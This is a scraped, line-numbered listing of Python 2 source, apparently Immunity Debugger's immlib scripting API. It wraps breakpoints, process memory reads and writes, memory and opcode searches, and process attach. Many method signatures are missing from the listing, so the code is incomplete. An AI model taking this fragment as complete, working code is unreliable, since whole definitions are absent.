1361 @return: All process threads
+
1362 """
+
1363 threads = debugger . Getallthreads ( )
+
1364 for thread in threads :
+
1365 T = Thread ( thread )
+
1366 T . _getfromtuple ( thread )
+
1367 self . Threads [ T . getId ( ) ] = T
+
1368 return self . Threads
+
1369
+
1370
+
1371
+
1372
+
1374 """
+
1375 Get All Symbols.
+
1376
+
1377 @rtype: DICTIONARY
+
1378 @return: All the symbols of the process
+
1379 """
+
1380 if self . Symbols :
+
1381 return self . Symbols
+
1382
+
1383 names = debugger . Getallnames ( )
+
1384 current = self . getDebuggedName ( ) . rsplit ( "." , 1 ) [ 0 ]
+
1385
+
1386 for a in names . keys ( ) :
+
1387 s = Symbol ( a )
+
1388 s . _getfromtuple ( names [ a ] )
+
1389 if current . lower ( ) != s . getModule ( ) . lower ( ) :
+
1390 module = s . getModule ( ) + ".dll"
+
1391 else :
+
1392 module = s . getModule ( ) + ".exe"
+
1393
+
1394 if self . Symbols . has_key ( module ) :
+
1395 self . Symbols [ module ] [ a ] = s
+
1396 else :
+
1397 self . Symbols [ module ] = { a : s }
+
1398
+
1399 return self . Symbols
+
1400
+
1402 """
+
1403 Get Symbols from module.
+
1404 @type Address: DWORD
+
1405 @param Address: Address from module.
+
1406
+
1407 @rtype: DICTIONARY
+
1408 @return: All the symbols of the module
+
1409 """
+
1410
+
1411 names = debugger . Getallnames ( address )
+
1412 return names
+
1413
+
1414
+
1415
+
1417 """
+
1418 Get a Back Trace (Call stack).
+
1419
+
1420 @rtype: LIST of Stack OBJECT
+
1421 @return: list of all the stack trace
+
1422 """
+
1423 if self . BackTrace :
+
1424 return self . BackTrace
+
1425
+
1426 callstack = debugger . Getcallstack ( )
+
1427 for a in callstack :
+
1428 s = Stack ( )
+
1429 s . _setfromtuple ( a )
+
1430 self . BackTrace . append ( s )
+
1431 return self . BackTrace
+
1432
+
1434 """
+
1435 Get the call tree of given address.
+
1436 @rtype: LIST of Call tuples
+
1437 @return: list of all the call tree
+
1438 ulong line; // Line number in column
+
1439 ulong dummy; // Must be 1
+
1440 ulong type; // Type, set of TY_xxx
+
1441 ulong entry; // Address of function
+
1442 ulong from; // Address of calling instruction
+
1443 ulong calls; // Address of called subfunction
+
1444 """
+
1445
+
1446 return debugger . Getcalltree ( address )
+
1447
+
1448
+
1450 """
+
1451 Find which module an address belongs to.
+
1452
+
1453 @type address: DWORD
+
1454 @param address: Address
+
1455
+
1456 @rtype: LIST
+
1457 @return: Tuple of module information (name, base address)
+
1458
+
1459 """
+
1460 mod = debugger . Findmodule ( address )
+
1461 if mod == - 1 :
+
1462 mod = ( )
+
1463 return mod
+
1464
+
1466 """
+
1467 Get a the process heaps
+
1468
+
1469 @rtype: LIST of DWORD
+
1470 @return: List of Heap Address
+
1471 """
+
1472 self . HeapsAddr = [ ]
+
1473
+
1474 peb = self . getPEB ( )
+
1475 addr = peb . ProcessHeaps
+
1476 for ndx in range ( 0 , peb . NumberOfHeaps ) :
+
1477 l = self . readLong ( addr + ndx * 4 )
+
1478 if l :
+
1479 self . HeapsAddr . append ( l )
+
1480
+
1481 return self . HeapsAddr
+
1482
+
1484 """
+
1485 Get the address from an expression as ntdll.RtlAllocateHeap
+
1486
+
1487 @type expression: STRING
+
1488 @param expression: Expression to translate into an address
+
1489
+
1490 @rtype: DWORD
+
1491 @return: Address of the Expression
+
1492 """
+
1493 return debugger . Getaddrfromexp ( expression )
+
1494
+
1495
+
1497 """
+
1498 Get the address from an expression as ntdll.RtlAllocateHeap
+
1499
+
1500 @type expression: STRING
+
1501 @param expression: Expression to translate into an address
+
1502
+
1503 @rtype: DWORD
+
1504 @return: Address of the Expression
+
1505
+
1506 """
+
1507 return debugger . Getaddrfromexp ( expression )
+
1508
+
1509
+
1510
+
1511
+
1512 - def Error ( self , msg ) :
+
1513 """
+
1514 This function shows an Error dialog with a custom message.
+
1515
+
1516 @type msg: STRING
+
1517 @param msg: Message
+
1518 """
+
1519 return debugger . Error ( msg )
+
1520
+
1521 - def openTextFile ( self , path = "" ) :
+
1522 """
+
1523 Opens text file in MDI windows. ( if no path is specified browsefile dialog will pop up )
+
1524
+
1525 @type: STRING
+
1526 @param: (Optional, Def= "") Path to file
+
1527 """
+
1528 if ( len ( path ) > 0 ) :
+
1529 return debugger . Opentextfile ( path )
+
1530 else :
+
1531 return debugger . Opentextfile ( )
+
1532
+
1534 """
+
1535 Sets the status bar message.
+
1536
+
1537 @type msg: STRING
+
1538 @param msg: Message
+
1539 """
+
1540 return debugger . Infoline ( msg )
+
1541
+
1543 """
+
1544 Removes the current status bar message.
+
1545 """
+
1546 return debugger . Infoline ( )
+
1547
+
1548 - def logLines ( self , data , address = 0 , highlight = False , gray = False , focus = 0 ) :
+
1549 """
+
1550 Adds multiple lines of ASCII text to the log window.
+
1551
+
1552 @type msg: LIST of STRING
+
1553 @param msg: List of Message to add (max size of msg is 255 bytes)
+
1554
+
1555 @type address: DWORD
+
1556 @param address: Address associated with the message
+
1557
+
1558 @type highlight: BOOLEAN
+
1559 @param highlight: Set highlight text
+
1560
+
1561 @type gray: BOOLEAN
+
1562 @param gray: Set gray text
+
1563 """
+
1564 return [ self . Log ( d , address , highlight , gray , focus ) for d in data . split ( "\n" ) ]
+
1565
+
1566 - def LogLines ( self , data , address = 0 , highlight = False , gray = False , focus = 0 ) :
+
1567 return [ self . Log ( d , address , highlight , gray , focus ) for d in data . split ( "\n" ) ]
+
1568
+
1569
+
1570 - def Log ( self , msg , address = 0 , highlight = False , gray = False , focus = 0 ) :
+
1571 """
+
1572 Adds a single line of ASCII text to the log window.
+
1573
+
1574 @type msg: STRING
+
1575 @param msg: Message (max size is 255 bytes)
+
1576
+
1577 @type address: DWORD
+
1578 @param address: Address associated with the message
+
1579
+
1580 @type highlight: BOOLEAN
+
1581 @param highlight: Set highlight text
+
1582
+
1583 @type gray: BOOLEAN
+
1584 @param gray: Set gray text
+
1585 """
+
1586 if gray and not highlight :
+
1587 highlight = - 1
+
1588 return debugger . Addtolist ( address , int ( highlight ) , msg [ : 255 ] , focus )
+
1589
+
1590 - def log ( self , msg , address = 0 , highlight = False , gray = False , focus = 0 ) :
+
1591 """
+
1592 Adds a single line of ASCII text to the log window.
+
1593
+
1594 @type msg: STRING
+
1595 @param msg: Message (max size is 255 bytes)
+
1596
+
1597 @type address: DWORD
+
1598 @param address: Address associated with the message
+
1599
+
1600 @type highlight: BOOLEAN
+
1601 @param highlight: Set highlight text
+
1602
+
1603 @type gray: BOOLEAN
+
1604 @param gray: Set gray text
+
1605 """
+
1606 if gray and not highlight :
+
1607 highlight = - 1
+
1608 return debugger . Addtolist ( address , int ( highlight ) , msg [ : 255 ] , focus )
+
1609
+
1610
+
1612 """
+
1613 Forces an immediate update of the log window.
+
1614 """
+
1615 debugger . Updatelist ( )
+
1616
+
1618 """
+
1619 Creates or restores the log window.
+
1620 """
+
1621 return debugger . Createlistwindow ( )
+
1622
+
1624 """
+
1625 Creates a custom window.
+
1626
+
1627 @type title: STRING
+
1628 @param title: Window title
+
1629
+
1630 @type col_titles: LIST OF STRING
+
1631 @param col_titles: Column titles list
+
1632
+
1633 @return HWND: Handler of created table
+
1634 """
+
1635 return self . createTable ( title , col_titles )
+
1636
+
1638 """
+
1639 Creates a custom window.
+
1640
+
1641 @type title: STRING
+
1642 @param title: Window title
+
1643
+
1644 @type col_titles: LIST OF STRING
+
1645 @param col_titles: Column titles list
+
1646
+
1647 """
+
1648 table = Table ( self , title , col_titles )
+
1649 return table
+
1650
+
1652 """
+
1653 Set focus on window.
+
1654
+
1655 @type handler: ULONG
+
1656 @param handler: Windows Handler
+
1657
+
1658 @return phandler: Handle to the window that previously had the focus.
+
1659 """
+
1660 return debugger . SetFocus ( handler )
+
1661
+
1663 """
+
1664 Does a window still exist?
+
1665
+
1666 @type handler: ULONG
+
1667 @param handler: Windows to check handle
+
1668
+
1669 @return: INT : 1 Exists, 0 Doesnt exist
+
1670 """
+
1671 return debugger . IsValidHandle ( handler )
+
1672
+
1674 """
+
1675 Sets and logs a status bar message.
+
1676
+
1677 @type addr: DWORD
+
1678 @param addr: Address related with the message
+
1679
+
1680 @type msg: STRING
+
1681 @param msg: Message
+
1682 """
+
1683 return debugger . Message ( addr , msg )
+
1684
+
1686 """
+
1687 Flashes a message at status bar.
+
1688
+
1689 @type msg: STRING
+
1690 @param msg: Message
+
1691 """
+
1692 return debugger . Flash ( msg )
+
1693
+
1695 """
+
1696 Displays a progress bar which can contain formatted text and a progress percentage.
+
1697 If the formatted text contains a dollar sign ('$') it will be replaced by the current progress percentage.
+
1698
+
1699 @type msg: STRING
+
1700 @param msg: Message
+
1701
+
1702 @type promille: DWORD
+
1703 @param promille: Progress. At 0 the progress bar is closed and the previous message restored.
+
1704 """
+
1705 return debugger . Progress ( promille , message )
+
1706
+
1708 """
+
1709 Close Progress Bar.
+
1710 """
+
1711 return debugger . Progress ( 0 , "" )
+
1712
+
1742
+
1743
+
1744
+
1745
+
1746
+
1749
+
1752
+
1755
+
1758
+
1759
+
1771
+
1773 """
+
1774 Set a label.
+
1775
+
1776 @type adresss: DWORD
+
1777 @param address: Address to the new label
+
1778
+
1779 @type label: STRING
+
1780 @param label: Label to add
+
1781 """
+
1782 return debugger . Setlabel ( address , label )
+
1783
+
1785 """
+
1786 Place a start mark for timming your script
+
1787 """
+
1788 self . timer = time . clock ( )
+
1789
+
1791 """
+
1792 Place an End mark for timming your script
+
1793
+
1794 @rtype time: DWORD
+
1795 @return time: time in seconds
+
1796 """
+
1797 if self . timer > 0 :
+
1798 return time . clock ( ) - self . timer
+
1799 else :
+
1800 return 0
+
1801
+
1803 """
+
1804 Find exported function on the loaded dlls.
+
1805
+
1806 @type lookfor: TABLE of DWORD
+
1807 @param lookfor: Table of functions to search
+
1808
+
1809 @rtype: DICTIONARY
+
1810 @return: Dictionary
+
1811 """
+
1812
+
1813
+
1814
+
1815 symbol = self . getAllSymbols ( )
+
1816
+
1817 result = { }
+
1818 for modname in symbol . keys ( ) :
+
1819 modsym = symbol [ modname ]
+
1820 for modaddr in modsym . keys ( ) :
+
1821 mod = modsym [ modaddr ]
+
1822 if mod . name . lower ( ) in lookfor :
+
1823 if mod . type == "Import" :
+
1824 if result . has_key ( modname ) :
+
1825 result [ modname ] . append ( mod )
+
1826 else :
+
1827 result [ modname ] = [ mod ]
+
1828 return result
+
1829
+
1830
+
1831
+
1833 """
+
1834 Check if debugger is running under a vmware machine
+
1835
+
1836 @rtype: DWORD
+
1837 @return: 1 if vmware machine exists
+
1838 """
+
1839 return debugger . checkvmWare ( )
+
1840
+
1841
+
1842
+
1843
+
1844
+
1845
+
1846
+
1847
+
1848
+
1849
+
1850
+
1851
+
1852
+
1853
+
1855 """
+
1856 Set a Manual Breakpoint.
+
1857
+
1858 @type address: DWORD
+
1859 @param address: Address of the breakpoint
+
1860
+
1861 @type key: DWORD
+
1862 @param key: VK_F2 (Conditional Breakpoint) or VK_F4 (Logging Breakpoint)
+
1863
+
1864 @type shiftkey: DWORD
+
1865 @param shiftkey: State of the shiftkey
+
1866
+
1867 @type font: STRING
+
1868 @param font: See ImmFonts
+
1869 """
+
1870 if not ImmFonts . has_key ( font . lower ( ) ) :
+
1871 font = ImmFonts [ "fixed" ]
+
1872 else :
+
1873 font = ImmFonts [ font . lower ( ) ]
+
1874
+
1875 return debugger . Manualbreakpoint ( address , key , int ( shiftkey ) , font )
+
1876
+
1878 """
+
1879 Set an Unconditional Breakpoint.
+
1880
+
1881 @type address: DWORD
+
1882 @param address: Address for the breakpoint
+
1883
+
1884 @type font: STRING
+
1885 @param font: (Optional, Def: fixed) Font for the breakpoint
+
1886 """
+
1887 return self . ManualBreakpoint ( address , BpKeys [ "VK_F2" ] , False , font )
+
1888
+
1890 """
+
1891 Set a Conditional Breakpoint.
+
1892
+
1893 @type address: DWORD
+
1894 @param address: Address for the breakpoint
+
1895
+
1896 @type font: STRING
+
1897 @param font: (Optional, Def: fixed) Font for the breakpoint
+
1898 """
+
1899 return self . ManualBreakpoint ( address , BpKeys [ "VK_F2" ] , True , font )
+
1900
+
1902 """
+
1903 Set a Logging Breakpoint. (This breakpoint will not puase the execution, it will just act as a Watch point"
+
1904
+
1905 @type address: DWORD
+
1906 @param address: Address for the breakpoint
+
1907 """
+
1908 return debugger . Setloggingbreakpoint ( address )
+
1909
+
1911 """
+
1912 Set a watching Breakpoint.
+
1913
+
1914 @type address: DWORD
+
1915 @param address: Address for the watchpoint
+
1916 """
+
1917 return debugger . Setloggingbreakpoint ( address )
+
1918
+
1919
+
1920
+
1921
+
1922
+
1923
+
1924
+
1925
+
1926
+
1927
+
1928
+
1929
+
1931 """
+
1932 Set a Temporary Breakpoint.
+
1933
+
1934 @type address: DWORD
+
1935 @param address: Address for the breakpoint
+
1936
+
1937 @type continue_execution: BOOLEAN
+
1938 @param continue_execution: Automatically removes temporary breakpoint when hit and continue execution
+
1939
+
1940 @type stoptrace: BOOLEAN
+
1941 @param stoptrace: Stop any kind of trace or animation when hit
+
1942 """
+
1943 if continue_execution :
+
1944 flags = BpFlags [ "TY_TEMP" ] | BpFlags [ "TY_KEEPCOND" ]
+
1945 else :
+
1946 flags = BpFlags [ "TY_ONESHOT" ] | BpFlags [ "TY_KEEPCOND" ]
+
1947 if stoptrace :
+
1948 flags |= BpFlags [ "TY_STOPAN" ]
+
1949
+
1950 return debugger . Tempbreakpoint ( address , flags )
+
1951
+
1953 """
+
1954 Set a Breakpoint.
+
1955
+
1956 @type address: DWORD
+
1957 @param address: Address for the breakpoint
+
1958 """
+
1959 flags = BpFlags [ "TY_ACTIVE" ]
+
1960 return debugger . Setbreakpoint ( address , flags , "" )
+
1961
+
1963 """
+
1964 Set a Breakpoint.
+
1965
+
1966 @type Name: STRING
+
1967 @param Name: name of the function to bp
+
1968
+
1969 @rtype: DWORD
+
1970 @return: Address of name
+
1971 """
+
1972 return debugger . Setbreakpointonname ( name )
+
1973
+
1975 """
+
1976 Disable Breakpoint.
+
1977
+
1978 @type address: DWORD
+
1979 @param address: Address for the breakpoint
+
1980 """
+
1981 flags = BpFlags [ "TY_DISABLED" ]
+
1982 return debugger . Setbreakpoint ( address , flags , "" )
+
1983
+
1985 """
+
1986 Delete Breakpoint.
+
1987
+
1988 @type address: DWORD
+
1989 @param address: Start range of addresses to delete breakpoints
+
1990 @type address2: DWORD
+
1991 @param Address: End range of addresses to delete breakpoints
+
1992 """
+
1993 return debugger . DeleteBreakpoints ( address , address2 )
+
1994
+1995
+
1997 """
+
1998 Get the Breakpoint type.
+
1999
+
2000 @type address: DWORD
+
2001 @param address: Address for the breakpoint
+
2002
+
2003 @rtype: STRING
+
2004 @return: Breakpoint type
+
2005 """
+
2006
+
2007 type = debugger . Getbreakpointtypecount ( address )
+
2008 for a in BpFlags . keys ( ) :
+
2009 if BpFlags [ a ] == type :
+
2010 return a
+
2011 return ""
+
2012
+
2014 """
+
2015 Modifies or removes a memory breakpoint.
+
2016
+
2017 @type address: DWORD
+
2018 @param address: Address for the breakpoint
+
2019
+
2020 @type type: DWORD
+
2021 @param type: Type of Memory Breakpoint (READ/WRITE/SFX)
+
2022
+
2023 @type size: DWORD
+
2024 @param size: (Optional, Def: 4) Size of Memory Breakpoint
+
2025 """
+
2026 ty = type . strip ( ) . split ( "|" )
+
2027 flags = 0
+
2028 for a in ty :
+
2029 try :
+
2030 flags |= BpMemFlags [ a ]
+
2031 except KeyError :
+
2032 raise Exception ( "Bad Flags for setMembreakpoint: %s" % type )
+
2033
+
2034 return debugger . Setmembreakpoint ( flags , addr , size )
+
2035
+
2037 """
+
2038 Disable Memory Breakpoint.
+
2039 """
+
2040 return debugger . Setmembreakpoint ( 0 , addr , 0 )
+
2041
+2042
+
2044 """
+
2045 Sets Hardware breakpoint
+
2046 """
+
2047 return debugger . Sethardwarebreakpoint ( type , addr , size )
+
2048
+2049
+2050
+2051
+2052
+
2054 """
+
2055 Write long to memory address.
+
2056
+
2057 @type address: DWORD
+
2058 @param address: Address
+
2059
+
2060 @type dword: DWORD
+
2061 @param dword: long to write
+
2062 """
+
2063 return debugger . Writememory ( immutils . intel_order ( dword ) , address , 4 , 0x2 )
+
2064
+
2066 """
+
2067 Write buffer to memory address.
+
2068
+
2069 @type address: DWORD
+
2070 @param address: Address
+
2071
+
2072 @type buf: BUFFER
+
2073 @param buf: Buffer
+
2074 """
+
2075 return debugger . Writememory ( buf , address , len ( buf ) , 0x2 )
+
2076
+
2078 """
+
2079 Read block of memory.
+
2080
+
2081 @type address: DWORD
+
2082 @param address: Address
+
2083
+
2084 @type size: DWORD
+
2085 @param size: Size
+
2086
+
2087 @rtype: BUFFER
+
2088 @return: Process memory
+
2089 """
+
2090 return debugger . Readmemory ( address , size , 0x01 | 0x02 )
+
2091
+
2093 """
+
2094 Read a Long from the debugged process
+
2095
+
2096 @type address: DWORD
+
2097 @param address: Address
+
2098
+
2099 @rtype: DWORD
+
2100 @return: Long
+
2101 """
+
2102 long = self . readMemory ( address , 0x4 )
+
2103 if len ( long ) == 4 :
+
2104 try :
+
2105 return immutils . str2int32_swapped ( long )
+
2106 except ValueError :
+
2107 raise Exception , "readLong failed to gather a long at 0x%08x" % address
+
2108 else :
+
2109 raise Exception , "readLong failed to gather a long at 0x%08x" % address
+
2110
+
2112 """
+
2113 Read a string from the remote process
+
2114
+
2115 @type address: DWORD
+
2116 @param address: Address of the string
+
2117
+
2118 @rtype: String
+
2119 @return: String
+
2120 """
+
2121 return self . readUntil ( address , '\x00' )
+
2122
+
2124 """
+
2125 Read a unicode string from the remote process
+
2126
+
2127 @type address: DWORD
+
2128 @param address: Address of the unicode string
+
2129
+
2130 @rtype: Unicode String
+
2131 @return: Unicode String
+
2132 """
+
2133 wstring = self . readUntil ( address , "\x00\x00" )
+
2134
+
2135 if not wstring . endswith ( "\x00" ) :
+
2136 wstring = wstring + "\x00"
+
2137
+
2138 return wstring
+
2139
+
2141 """
+
2142 Read string until ending starting at given address
+
2143
+
2144 @param Address: Start address
+
2145 @return Readed String
+
2146 """
+
2147 readed = [ ]
+
2148 while ( 1 ) :
+
2149 read = self . readMemory ( address , 16 )
+
2150 address += 16
+
2151 ndx = read . find ( ending )
+
2152 if ndx != - 1 :
+
2153 readed . append ( read [ 0 : ndx ] )
+
2154 break
+
2155 else :
+
2156 readed . append ( read )
+
2157
+
2158 return string . joinfields ( readed , "" )
+
2159
+
2161 """
+
2162 Read a short integer from the remote process
+
2163
+
2164 @type address: DWORD
+
2165 @param address: Address of the short
+
2166
+
2167 @rtype: Short Integer
+
2168 @return: Short
+
2169 """
+
2170 short = self . readMemory ( address , 0x2 )
+
2171 return immutils . str2int16_swapped ( short )
+
2172
+
2174 """
+
2175 Search a short integer on the remote process memory
+
2176
+
2177 @type short: SHORT
+
2178 @param short: Short integer to search for
+
2179
+
2180 @type flag: STRING
+
2181 @param flag: Memory Protection String Flag
+
2182
+
2183 @rtype: List
+
2184 @return: List of address of the short integer founded
+
2185 """
+
2186 return self . Search ( immutils . int2str16_swapped ( short ) , flag )
+
2187
+2189 """
+2190 Search a short integer on the remote process memory 2191 2192 @type long: DWORD 2193 @param long: integer to search for 2194 @type flag: STRING 2195 @param flag: Memory Protection String Flag 2196 2197 @rtype: List 2198 @return: List of address of the integer founded 2199 """ 2200 return self . Search ( immutils . int2str32_swapped ( long ) , flag )
+2201
+
2203 """
+
2204 Search string in executable memory.
+
2205
+
2206 @param buf: Buffer to search for
+
2207 @return: A list of address where the string was found on memory
+
2208 """
+
2209 if not buf :
+
2210 return [ ]
+
2211 self . getMemoryPages ( )
+
2212 find = [ ]
+
2213 buf_size = len ( buf )
+
2214 for a in self . MemoryPages . keys ( ) :
+
2215 if ( MemoryProtection [ "PAGE_EXECUTE" ] == self . MemoryPages [ a ] . access \
+
2216 or MemoryProtection [ "PAGE_EXECUTE_READ" ] == self . MemoryPages [ a ] . access \
+
2217 or MemoryProtection [ "PAGE_EXECUTE_READWRITE" ] == self . MemoryPages [ a ] . access \
+
2218 or MemoryProtection [ "PAGE_EXECUTE_WRITECOPY" ] == self . MemoryPages [ a ] . access ) :
+
2219 mem = self . MemoryPages [ a ] . getMemory ( )
+
2220 if not mem :
+
2221 continue
+
2222 ndx = 0
+
2223 while 1 :
+
2224 f = mem [ ndx : ] . find ( buf )
+
2225 if f == - 1 : break
+
2226 find . append ( ndx + f + a )
+
2227 ndx += f + buf_size
+
2228 return find
+
2229
+
2231 """
+
2232 Search string in writable memory.
+
2233
+
2234 @param buf: Buffer to search for
+
2235 @return: A list of address where the string was found on memory
+
2236 """
+
2237 if not buf :
+
2238 return [ ]
+
2239 self . getMemoryPages ( )
+
2240 find = [ ]
+
2241 buf_size = len ( buf )
+
2242 for a in self . MemoryPages . keys ( ) :
+
2243 if ( MemoryProtection [ "PAGE_READWRITE" ] == self . MemoryPages [ a ] . access \
+
2244 or MemoryProtection [ "PAGE_WRITECOPY" ] == self . MemoryPages [ a ] . access \
+
2245 or MemoryProtection [ "PAGE_EXECUTE_READWRITE" ] == self . MemoryPages [ a ] . access \
+
2246 or MemoryProtection [ "PAGE_EXECUTE_WRITECOPY" ] == self . MemoryPages [ a ] . access ) :
+
2247 mem = self . MemoryPages [ a ] . getMemory ( )
+
2248 if not mem :
+
2249 continue
+
2250 ndx = 0
+
2251 while 1 :
+
2252 f = mem [ ndx : ] . find ( buf )
+
2253 if f == - 1 : break
+
2254 find . append ( ndx + f + a )
+
2255 ndx += f + buf_size
+
2256 return find
+
2257
+
2259 """
+
2260 Search string in readable memory.
+
2261
+
2262 @param buf: Buffer to search for
+
2263 @return: A list of address where the string was found on memory
+
2264 """
+
2265 if not buf :
+
2266 return [ ]
+
2267 self . getMemoryPages ( )
+
2268 find = [ ]
+
2269 buf_size = len ( buf )
+
2270 for a in self . MemoryPages . keys ( ) :
+
2271 if ( MemoryProtection [ "PAGE_READONLY" ] == self . MemoryPages [ a ] . access \
+
2272 or MemoryProtection [ "PAGE_EXECUTE_READ" ] == self . MemoryPages [ a ] . access ) :
+
2273 mem = self . MemoryPages [ a ] . getMemory ( )
+
2274 if not mem :
+
2275 continue
+
2276 ndx = 0
+
2277 while 1 :
+
2278 f = mem [ ndx : ] . find ( buf )
+
2279 if f == - 1 : break
+
2280 find . append ( ndx + f + a )
+
2281 ndx += f + buf_size
+
2282 return find
+
2283
+2284
+2285
+2286
+2287
+2288 - def Search ( self , buf , flag = None ) :
+
2289 """
+
2290 Search string in memory.
+
2291
+
2292 @param buf: Buffer to search for
+
2293 @param flag: Memory Protection String Flag
+
2294 @return: A list of address where the string was found on memory
+
2295
+
2296
+
2297 """
+
2298 if not buf :
+
2299 return [ ]
+
2300
+
2301 self . getMemoryPages ( )
+
2302 find = [ ]
+
2303 buf_size = len ( buf )
+
2304 for a in self . MemoryPages . keys ( ) :
+
2305 if flag :
+
2306 if ( MemoryProtection [ flag ] == self . MemoryPages [ a ] . access ) :
+
2307 mem = self . MemoryPages [ a ] . getMemory ( )
+
2308 if not mem :
+
2309 continue
+
2310 ndx = 0
+
2311 while 1 :
+
2312 f = mem [ ndx : ] . find ( buf )
+
2313 if f == - 1 : break
+
2314 find . append ( ndx + f + a )
+
2315 ndx += f + buf_size
+
2316 else :
+
2317 mem = self . MemoryPages [ a ] . getMemory ( )
+
2318 if not mem :
+
2319 continue
+
2320 ndx = 0
+
2321 while 1 :
+
2322 f = mem [ ndx : ] . find ( buf )
+
2323 if f == - 1 : break
+
2324 find . append ( ndx + f + a )
+
2325 ndx += f + buf_size
+
2326 return find
+
2327
+
2329 """
+
2330 Search for a sequence of commands in all executable modules loaded.
+
2331 @type cmd: STRING
+
2332 @param cmd: Assembly code to search for (Search using regexp is available. See Documentation)
+
2333
+
2334 @rtype: List
+
2335 @return: List of address of the command found
+
2336
+
2337 NOTE: Since ImmunityDebugger 1.2 , the returning tuple[1] value is deprecated,
+
2338 if you need the opcode string of the resulted address, you'll have to do a immlib.Disasm(tuple[0]).
+
2339
+
2340 """
+
2341 address = 0
+
2342 return debugger . Searchregexp ( address , cmd )
+
2343
+
2345 """
+
2346 Search for a sequence of commands in given executable module.
+
2347 @type cmd: STRING
+
2348 @param cmd: Assembly code to search for (Search using regexp is available. See Documentation)
+
2349
+
2350 @rtype: List
+
2351 @return: List of address of the command found
+
2352
+
2353 NOTE: Since ImmunityDebugger 1.2 , the returning tuple[1] value is deprecated,
+
2354 if you need the opcode string of the resulted address, you'll have to do a immlib.Disasm(tuple[0]).
+
2355
+
2356 """
+
2357 return debugger . Searchregexp ( address , cmd )
+
2358
+2359
+2360
+2361
+2362 - def Run ( self , address = 0 ) :
+
2363 """Run Process untill address.
+
2364 @param address: Address"""
+
2365 self . clearState ( )
+
2366 return debugger . Run ( address )
+
2367
+
2369 """Run Process till ret.
+
2370 """
+
2371 self . clearState ( )
+
2372 return debugger . Runtillret ( )
+
2373
+2374
+
2376 """Pause process"""
+
2377 return debugger . Pause ( )
+
2378
+
2380 """
+
2381 Step-Over Process untill address.
+
2382
+
2383 @type address: DWORD
+
2384 @param address: (Optional, Def = 0) Address
+
2385 """
+
2386 self . clearState ( )
+
2387 return debugger . Stepover ( address )
+
2388
+2389 - def stepIn ( self , address = 0 ) :
+
2390 """
+
2391 Step-in Process untill address.
+
2392
+
2393 @type address: DWORD
+
2394 @param address: (Optional, Def = 0) Address
+
2395 """
+
2396 self . clearState ( )
+
2397 return debugger . Stepin ( address )
+
2398
+
2400 """
+
2401 Quits debugger
+
2402 """
+
2403 return debugger . exitID ( )
+
2404
+2405
+
2407 """
+
2408 Ignore Single Step events
+
2409 @type flag: STRING
+
2410 @param flag: How to continue after a single event is catched
+
2411 flag = DISABLE : Disable ignoring
+
2412 flag = FORCE : Conventional Force continue method
+
2413 flag = CONTINUE : Transparent continue method
+
2414
+
2415 CAUTION: This method overrides GUI option 'single-step break'
+
2416 """
+
2417 return debugger . IgnoreSingleStep ( IgnoreSingleStep [ flag ] )
+
2418
+2419
+
2421 """
+
2422 Open process for debugging
+
2423 @type path: STRING
+
2424 @param path: Path to file to debug
+
2425 @type mode: INTEGER
+
2426 @param mode: How to start: -2 SILENT, 0 NORMAL
+
2427 """
+
2428 return debugger . Open ( path , mode )
+
2429
+
2431 """
+
2432 Restart debuggee
+
2433 @type mode: INTEGER
+
2434 @param mode: How to restart : -2 SILENT, -1 MSGBOX
+
2435
+
2436 """
+
2437 return debugger . Open ( "" , mode )
+
2438
+2439
+
2441 """
+
2442 Attach to an active process
+
2443 @type pid: INTEGER
+
2444 @param pid: Process Id.
+
2445 """
+
2446 return debugger . Attach ( pid )
+
2447
+
2449 """
+
2450 Dettach from active process
+
2451 """
+
2452
+
2453 return debugger . Dettach ( )
+
2454
+2455
+
2457 """
+
2458 Prepare Debugger for fresh debugging session
+
2459 NOTE: be sure to know what you are doing when
+
2460 calling this method
+
2461 """
+
2462 return debugger . Preparefornewps ( )
+
2463
+2464
+2465
+2466
+2467
+2468
+2469
+2470
+2471
+2472
+2473
+2474
+2475
+2476
+2477
+
2479 """ Set/Unset silent debugging flag
+
2480 @type silent: INTEGER
+
2481 @param silent: 1 to set silent, 0 to unset
+
2482 """
+
2483 return debugger . GoSilent ( silent )
+
2484
+2486 """
+
2487 Add a header to given row.
+
2488 @type address: DWORD
+
2489 @param address: Address to add the header into
+
2490 @type header: STRING
+
2491 @param header: Header string to add into row
+
2492 @type color: STRING
+
2493 @param color: Color of text
+
2494 """
+
2495 return debugger . AddHeaderToRow ( address , header , ImmDrawColors [ color ] )
+
2496
+2498 """
+
2499 Removes header from row.
+
2500 @type address: DWORD
+
2501 @param address: Address to remove the header from
+
2502 """
+
2503 return debugger . RemoveHeaderFromRow ( address )
+
2504
+
2506 """
+
2507 Removes header from row.
+
2508 @type address: DWORD
+
2509 @param address: Address to remove the header from
+
2510 """
+
2511 return debugger . RemoveHeaderFromRow ( address )
+
2512
+2514 """
+
2515 Get Header from row.
+
2516 @type address: DWORD
+
2517 @param address: Address to get the headers from
+
2518 @return PYLIST: List of strings
+
2519 """
+
2520 return debugger . GetHeaderFromRow ( address )
+
2521
+2522
+2523
+2524
+2525 - def addLine ( self , address , header , color = "Black" ) :
+
2526 """
+
2527 Add a line to cpu window.
+
2528 @type address: DWORD
+
2529 @param address: Address to add line
+
2530 @type header: STRING
+
2531 @param header: Header string to add into row
+
2532 @type color: STRING
+
2533 @param color: Color of text
+
2534 """
+
2535 return debugger . AddHeaderToRow ( address , header , ImmDrawColors [ color ] )
+
2536
+2537
+
2539 """
+
2540 GoTo the Disassembler Window.
+
2541
+
2542 @type addr: DWORD
+
2543 @param addr: Address to show on the Disassembler Window
+
2544 """
+
2545 return debugger . Setcpu ( self . threadid , addr , 0 , 0 , 0x8000L )
+
2546
+
2548 """
+
2549 GoTo Dump Window.
+
2550
+
2551 @type addr: DWORD
+
2552 @param addr: Address to show on the Dump Window
+
2553 """
+
2554 return debugger . Setcpu ( self . threadid , 0 , addr , 0 , 0x8000L )
+
2555
+
2557 """
+
2558 GoTo the Stack Window.
+
2559 @type addr: DWORD
+
2560 @param addr: Address to show on the Stack Window
+
2561 """
+
2562 return debugger . Setcpu ( self . threadid , 0 , 0 , addr , 0x8000L )
+
2563
+
2574
+
2576 """
+
2577 Creates Dialog with a Combobox.
+
2578
+
2579 @type title: STRING
+
2580 @param title: Title for the dialog
+
2581
+
2582 @type combolist: LIST
+
2583 @param combolist: List of items to add to combo dialog
+
2584
+
2585 @return: Selected item
+
2586 """
+
2587 return debugger . Combobox ( title , combolist , len ( combolist ) )
+
2588
+2589
+2590
+2591
+2592
+2593
+
2595 """
+
2596 Get the status of the debugged process.
+
2597
+
2598 @return: Status of the debugged process
+
2599 """
+
2600 return debugger . Getstatus ( )
+
2601
+
